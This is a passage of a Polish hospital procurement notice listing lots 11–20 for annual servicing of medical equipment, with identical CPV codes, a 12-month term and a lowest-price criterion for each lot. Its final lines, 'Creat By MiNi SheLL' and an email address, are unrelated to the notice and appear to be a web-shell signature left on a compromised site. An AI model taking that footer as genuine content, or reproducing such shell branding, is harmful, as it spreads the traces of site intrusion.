<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Przeglądy aparatów do znieczulenia ogólnego, parowników, centrali intensywnego nadzoru, monitorów, ekranów kopiujących, respiratorów stacjonarnych, transportowych i BEBYLOG 8000, inkubatorów intensywnej terapii noworodka i pomp infuzyjnych firmy DRÄGER.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet szczegółowo opisany w Formularzu cenowym (Załacznik nr 1 do SIWZ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Przeglądy kolumn anestezjologicznych i chirurgicznych firmy Kendromed, lamp operacyjnych jednokopułowych i dwukopułowych firmy BERTCHOLD.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet szczegółowo opisany w Formularzu cenowym (Załacznik nr 1 do SIWZ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Przeglądy wag niemowlęcych, medycznych i krzesełkowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet szczegółowo opisany w Formularzu cenowym (Załacznik nr 1 do SIWZ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Przeglądy przewoźnego aparatu RTG firmy SHIMADZU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet szczegółowo opisany w Formularzu cenowym (Załacznik nr 1 do SIWZ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Przeglądy przewoźnego aparatu RTG firmy KOSMED.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet szczegółowo opisany w Formularzu cenowym (Załacznik nr 1 do SIWZ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Przeglądy przewoźnego aparatu RTG firmy SIEMENS.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet szczegółowo opisany w Formularzu cenowym (Załacznik nr 1 do SIWZ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Przeglądy aparatu dopplerowskiego firmy POLEMS.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet szczegółowo opisany w Formularzu cenowym (Załacznik nr 1 do SIWZ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Przeglądy videogastroskopu, videoduodenoskopu, fiberobronchoskopu i videokolonoskopów firmy PENTAX.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet szczegółowo opisany w Formularzu cenowym (Załacznik nr 1 do SIWZ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Przeglądy stołów operacyjnych firmy STERIS.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet szczegółowo opisany w Formularzu cenowym (Załacznik nr 1 do SIWZ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Przeglądy inkubatora otwartego firmy UNIMED.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet szczegółowo opisany w Formularzu cenowym (Załacznik nr 1 do SIWZ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com